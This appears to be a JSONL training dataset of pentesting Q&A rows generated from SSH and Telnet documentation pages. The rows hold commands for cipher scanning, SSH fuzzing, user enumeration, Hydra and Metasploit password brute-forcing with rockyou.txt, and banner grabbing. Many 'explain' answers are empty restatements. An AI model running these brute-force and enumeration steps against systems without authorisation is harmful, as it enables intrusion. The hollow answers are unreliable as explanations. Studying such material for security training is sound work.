weak cipher algorithms. Weak Cipher Algorithms"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sslscan :22`?", "response": "This command is used for 🛠️ ssh - weak cipher algorithms. Weak Cipher Algorithms", "metadata": {"corpus_index": 1535, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the nmap command for 🛠️ ssh - weak cipher algorithms"}, {"role": "assistant", "content": "nmap -p22 -n -sV --script ssh2-enum-algos"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the nmap command for 🛠️ ssh - weak cipher algorithms", "response": "nmap -p22 -n -sV --script ssh2-enum-algos", "metadata": {"corpus_index": 1536, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nmap"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ SSH - Weak Cipher Algorithms?"}, {"role": "assistant", "content": "nmap -p22 -n -sV --script ssh2-enum-algos"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ SSH - Weak Cipher Algorithms?", "response": "nmap -p22 -n -sV --script ssh2-enum-algos", "metadata": {"corpus_index": 1536, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nmap -p22 -n -sV --script ssh2-enum-algos`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - weak cipher algorithms. Weak Cipher Algorithms"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nmap -p22 -n -sV --script ssh2-enum-algos`?", "response": "This command is used for 🛠️ ssh - weak cipher algorithms. Weak Cipher Algorithms", "metadata": {"corpus_index": 1536, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ssh-audit syntax for 🛠️ ssh - weak cipher algorithms?"}, {"role": "assistant", "content": "ssh-audit -p 22 -4"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ssh-audit syntax for 🛠️ ssh - weak cipher algorithms?", "response": "ssh-audit -p 22 -4", "metadata": {"corpus_index": 1537, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ssh-audit"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ SSH - Weak Cipher Algorithms"}, {"role": "assistant", "content": "ssh-audit -p 22 -4"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ SSH - Weak Cipher Algorithms", "response": "ssh-audit -p 22 -4", "metadata": {"corpus_index": 1537, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ssh-audit -p 22 -4`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - weak cipher algorithms. Weak Cipher Algorithms"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ssh-audit -p 22 -4`?", "response": "This command is used for 🛠️ ssh - weak cipher algorithms. Weak Cipher Algorithms", "metadata": {"corpus_index": 1537, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ SSH - SSH fuzzing"}, {"role": "assistant", "content": "Fuzzing the SSH service could help to find vulnerabilities. The automated fuzzing is simple but not very targeted so it usually takes a lot of time and could miss some results.\\\nThe custom and the manual approach is more effective but it takes time to familiarize yourself with the target. Here is an example of a custom fuzzing : Fuzzing the OpenSSH daemon using AFL.\n\n::: tabs\n\n=== Automated fuzzing\n\n``bash\nmsfconsole\nuse auxiliary/fuzzers/ssh/ssh_version_2\nset RHOSTS \nrun\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ SSH - SSH fuzzing", "response": "Fuzzing the SSH service could help to find vulnerabilities. The automated fuzzing is simple but not very targeted so it usually takes a lot of time and could miss some results.\\\nThe custom and the manual approach is more effective but it takes time to familiarize yourself with the target. Here is an example of a custom fuzzing : Fuzzing the OpenSSH daemon using AFL.\n\n::: tabs\n\n=== Automated fuzzing\n\n``bash\nmsfconsole\nuse auxiliary/fuzzers/ssh/ssh_version_2\nset RHOSTS \nrun\n``\n\n:::", "metadata": {"corpus_index": 1538, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ SSH - SSH fuzzing?"}, {"role": "assistant", "content": "Fuzzing the SSH service could help to find vulnerabilities. The automated fuzzing is simple but not very targeted so it usually takes a lot of time and could miss some results.\\\nThe custom and the manual approach is more effective but it takes time to familiarize yourself with the target. Here is an example of a custom fuzzing : Fuzzing the OpenSSH daemon using AFL.\n\n::: tabs\n\n=== Automated fuzzing\n\n``bash\nmsfconsole\nuse auxiliary/fuzzers/ssh/ssh_version_2\nset RHOSTS \nrun\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ SSH - SSH fuzzing?", "response": "Fuzzing the SSH service could help to find vulnerabilities. The automated fuzzing is simple but not very targeted so it usually takes a lot of time and could miss some results.\\\nThe custom and the manual approach is more effective but it takes time to familiarize yourself with the target. Here is an example of a custom fuzzing : Fuzzing the OpenSSH daemon using AFL.\n\n::: tabs\n\n=== Automated fuzzing\n\n``bash\nmsfconsole\nuse auxiliary/fuzzers/ssh/ssh_version_2\nset RHOSTS \nrun\n``\n\n:::", "metadata": {"corpus_index": 1538, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the msfconsole command for 🛠️ ssh - ssh fuzzing"}, {"role": "assistant", "content": "msfconsole\nuse auxiliary/fuzzers/ssh/ssh_version_2\nset RHOSTS \nrun"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the msfconsole command for 🛠️ ssh - ssh fuzzing", "response": "msfconsole\nuse auxiliary/fuzzers/ssh/ssh_version_2\nset RHOSTS \nrun", "metadata": {"corpus_index": 1539, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "msfconsole"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ SSH - SSH fuzzing?"}, {"role": "assistant", "content": "msfconsole\nuse auxiliary/fuzzers/ssh/ssh_version_2\nset RHOSTS \nrun"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ SSH - SSH fuzzing?", "response": "msfconsole\nuse auxiliary/fuzzers/ssh/ssh_version_2\nset RHOSTS \nrun", "metadata": {"corpus_index": 1539, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `msfconsole`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - ssh fuzzing. SSH fuzzing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `msfconsole`?", "response": "This command is used for 🛠️ ssh - ssh fuzzing. SSH fuzzing", "metadata": {"corpus_index": 1539, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ SSH - User enumeration"}, {"role": "assistant", "content": "``bash\nmsfconsole\nuse scanner/ssh/ssh_enumusers\nset RHOSTS \nset USER_FILE \n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ SSH - User enumeration", "response": "``bash\nmsfconsole\nuse scanner/ssh/ssh_enumusers\nset RHOSTS \nset USER_FILE \n``", "metadata": {"corpus_index": 1540, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ SSH - User enumeration?"}, {"role": "assistant", "content": "``bash\nmsfconsole\nuse scanner/ssh/ssh_enumusers\nset RHOSTS \nset USER_FILE \n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ SSH - User enumeration?", "response": "``bash\nmsfconsole\nuse scanner/ssh/ssh_enumusers\nset RHOSTS \nset USER_FILE \n``", "metadata": {"corpus_index": 1540, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the msfconsole syntax for 🛠️ ssh - user enumeration?"}, {"role": "assistant", "content": "msfconsole\nuse scanner/ssh/ssh_enumusers\nset RHOSTS \nset USER_FILE"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the msfconsole syntax for 🛠️ ssh - user enumeration?", "response": "msfconsole\nuse scanner/ssh/ssh_enumusers\nset RHOSTS \nset USER_FILE", "metadata": {"corpus_index": 1541, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "msfconsole"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ SSH - User enumeration"}, {"role": "assistant", "content": "msfconsole\nuse scanner/ssh/ssh_enumusers\nset RHOSTS \nset USER_FILE"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ SSH - User enumeration", "response": "msfconsole\nuse scanner/ssh/ssh_enumusers\nset RHOSTS \nset USER_FILE", "metadata": {"corpus_index": 1541, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `msfconsole`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - user enumeration. User enumeration"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `msfconsole`?", "response": "This command is used for 🛠️ ssh - user enumeration. User enumeration", "metadata": {"corpus_index": 1541, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ SSH - Password Bruteforcing?"}, {"role": "assistant", "content": "::: tabs\n\n=== Hydra\n\n``bash\nhydra -l -s 22 -P -t 4 ssh\n`\n\n=== Metasploit\n\n`bash\nmsfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset PASS_FILE /usr/share/wordlists/password/rockyou.txt\nset RHOSTS \nset STOP_ON_SUCCESS true\nset username \nrun\n``\n\n:::\n\nSome common ssh credentials here and here."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ SSH - Password Bruteforcing?", "response": "::: tabs\n\n=== Hydra\n\n``bash\nhydra -l -s 22 -P -t 4 ssh\n`\n\n=== Metasploit\n\n`bash\nmsfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset PASS_FILE /usr/share/wordlists/password/rockyou.txt\nset RHOSTS \nset STOP_ON_SUCCESS true\nset username \nrun\n``\n\n:::\n\nSome common ssh credentials here and here.", "metadata": {"corpus_index": 1542, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ SSH - Password Bruteforcing?"}, {"role": "assistant", "content": "::: tabs\n\n=== Hydra\n\n``bash\nhydra -l -s 22 -P -t 4 ssh\n`\n\n=== Metasploit\n\n`bash\nmsfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset PASS_FILE /usr/share/wordlists/password/rockyou.txt\nset RHOSTS \nset STOP_ON_SUCCESS true\nset username \nrun\n``\n\n:::\n\nSome common ssh credentials here and here."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ SSH - Password Bruteforcing?", "response": "::: tabs\n\n=== Hydra\n\n``bash\nhydra -l -s 22 -P -t 4 ssh\n`\n\n=== Metasploit\n\n`bash\nmsfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset PASS_FILE /usr/share/wordlists/password/rockyou.txt\nset RHOSTS \nset STOP_ON_SUCCESS true\nset username \nrun\n``\n\n:::\n\nSome common ssh credentials here and here.", "metadata": {"corpus_index": 1542, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the hydra syntax for 🛠️ ssh - password bruteforcing?"}, {"role": "assistant", "content": "hydra -l -s 22 -P -t 4 ssh"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the hydra syntax for 🛠️ ssh - password bruteforcing?", "response": "hydra -l -s 22 -P -t 4 ssh", "metadata": {"corpus_index": 1543, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hydra"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ SSH - Password Bruteforcing"}, {"role": "assistant", "content": "hydra -l -s 22 -P -t 4 ssh"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ SSH - Password Bruteforcing", "response": "hydra -l -s 22 -P -t 4 ssh", "metadata": {"corpus_index": 1543, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `hydra -l -s 22 -P -t 4 ssh`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - password bruteforcing. Password Bruteforcing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `hydra -l -s 22 -P -t 4 ssh`?", "response": "This command is used for 🛠️ ssh - password bruteforcing. Password Bruteforcing", "metadata": {"corpus_index": 1543, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the msfconsole syntax for 🛠️ ssh - password bruteforcing?"}, {"role": "assistant", "content": "msfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset PASS_FILE /usr/share/wordlists/password/rockyou.txt\nset RHOSTS \nset STOP_ON_SUCCESS true\nset username \nrun"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the msfconsole syntax for 🛠️ ssh - password bruteforcing?", "response": "msfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset PASS_FILE /usr/share/wordlists/password/rockyou.txt\nset RHOSTS \nset STOP_ON_SUCCESS true\nset username \nrun", "metadata": {"corpus_index": 1544, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "msfconsole"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ SSH - Password Bruteforcing"}, {"role": "assistant", "content": "msfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset PASS_FILE /usr/share/wordlists/password/rockyou.txt\nset RHOSTS \nset STOP_ON_SUCCESS true\nset username \nrun"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ SSH - Password Bruteforcing", "response": "msfconsole\nuse auxiliary/scanner/ssh/ssh_login\nset PASS_FILE /usr/share/wordlists/password/rockyou.txt\nset RHOSTS \nset STOP_ON_SUCCESS true\nset username \nrun", "metadata": {"corpus_index": 1544, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `msfconsole`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ssh - password bruteforcing. Password Bruteforcing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `msfconsole`?", "response": "This command is used for 🛠️ ssh - password bruteforcing. Password Bruteforcing", "metadata": {"corpus_index": 1544, "category": "crypto", "source_file": "docs/src/infra/protocols/ssh.md", "page_title": "🛠️ SSH", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Telnet - Theory"}, {"role": "assistant", "content": "Telnet (teletype network) is a network protocol used to gain access to a virtual terminal in local or in remote systems . It provides bidirectional text-based communication .\n\n----"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Telnet - Theory", "response": "Telnet (teletype network) is a network protocol used to gain access to a virtual terminal in local or in remote systems . It provides bidirectional text-based communication .\n\n----", "metadata": {"corpus_index": 1545, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Telnet - Theory"}, {"role": "assistant", "content": "Telnet (teletype network) is a network protocol used to gain access to a virtual terminal in local or in remote systems . It provides bidirectional text-based communication .\n\n----"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Telnet - Theory", "response": "Telnet (teletype network) is a network protocol used to gain access to a virtual terminal in local or in remote systems . It provides bidirectional text-based communication .\n\n----", "metadata": {"corpus_index": 1545, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ Telnet - Common telnet commands"}, {"role": "assistant", "content": "| Command | Description |\n| --------- | -------------------------------------------------------------- |\n| open | Connects to a specified local/remote host |\n| close | Closes the current connection |\n| quit | Exits telnet |\n| status | Shows the current status of the telnet client |\n| z | Suspends telnet (on Unix/Linux systems) |\n| set | Sets Telnet options (like terminal type) |\n| unset | Unsets Telnet options |\n| display | Displays current settings of Telnet options |\n| send | Sends special characters or sequences (like break) |\n| mode | Sets the mode of operation (e.g., line by line or character) |\n| logout | Logs out from the remote system (not available on all systems) |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ Telnet - Common telnet commands", "response": "| Command | Description |\n| --------- | -------------------------------------------------------------- |\n| open | Connects to a specified local/remote host |\n| close | Closes the current connection |\n| quit | Exits telnet |\n| status | Shows the current status of the telnet client |\n| z | Suspends telnet (on Unix/Linux systems) |\n| set | Sets Telnet options (like terminal type) |\n| unset | Unsets Telnet options |\n| display | Displays current settings of Telnet options |\n| send | Sends special characters or sequences (like break) |\n| mode | Sets the mode of operation (e.g., line by line or character) |\n| logout | Logs out from the remote system (not available on all systems) |", "metadata": {"corpus_index": 1546, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Telnet - Common telnet commands"}, {"role": "assistant", "content": "| Command | Description |\n| --------- | -------------------------------------------------------------- |\n| open | Connects to a specified local/remote host |\n| close | Closes the current connection |\n| quit | Exits telnet |\n| status | Shows the current status of the telnet client |\n| z | Suspends telnet (on Unix/Linux systems) |\n| set | Sets Telnet options (like terminal type) |\n| unset | Unsets Telnet options |\n| display | Displays current settings of Telnet options |\n| send | Sends special characters or sequences (like break) |\n| mode | Sets the mode of operation (e.g., line by line or character) |\n| logout | Logs out from the remote system (not available on all systems) |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Telnet - Common telnet commands", "response": "| Command | Description |\n| --------- | -------------------------------------------------------------- |\n| open | Connects to a specified local/remote host |\n| close | Closes the current connection |\n| quit | Exits telnet |\n| status | Shows the current status of the telnet client |\n| z | Suspends telnet (on Unix/Linux systems) |\n| set | Sets Telnet options (like terminal type) |\n| unset | Unsets Telnet options |\n| display | Displays current settings of Telnet options |\n| send | Sends special characters or sequences (like break) |\n| mode | Sets the mode of operation (e.g., line by line or character) |\n| logout | Logs out from the remote system (not available on all systems) |", "metadata": {"corpus_index": 1546, "category": "linux", "source_file": "docs/src/infra/protocols/telnet.md", "page_title": "🛠️ Telnet", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Telnet - Banner grabbing?"}, {"role": "assistant", "content": "To initiate a connection with telnet server and get any information about the target .\n\n> [!TIP]\n> The $TARGET_PORT is optional, but the default port is 23\n\n::: tabs\n\n=== Unix-like\n\nThe Telnet banner of a target can be captured using multiple tools on UNIX-like systems.\n\n``bash\n#Using Netcat\nnc -nv $TARGET_IP $TARGET_PORT\n\n#Using Telnet\ntelnet $TARGET_IP $TARGET_PORT\n\n#Using Shodan-cli\nshodan stream --ports 23,1023,2323 --datadir telnet-data/ --limit 10000\n\n#Using nmap\nnmap -p $TARGET_PORT -sVC --script \"telnet and safe\" $TARGET_IP\n`\nThe Metasploit framework can also be used to make this work.\n\n`\nmsf > use auxiliary/scanner/telnet/telnet_version\nmsf > set rhosts $TARGET_IP\nmsf > set rport $TARGET_PORT\nmsf > set threads 5\nmsf > exploit\n`\n\n=== Windows\n\nOn Windows systems, multiple tools can be used to capture the Telnet banner of a target.\n\n`powershell\nnc.exe -nv $TARGET_IP $TARGET_PORT\n\ntelnet $TARGET_IP $TARGET_PORT\n\nnmap.exe -p 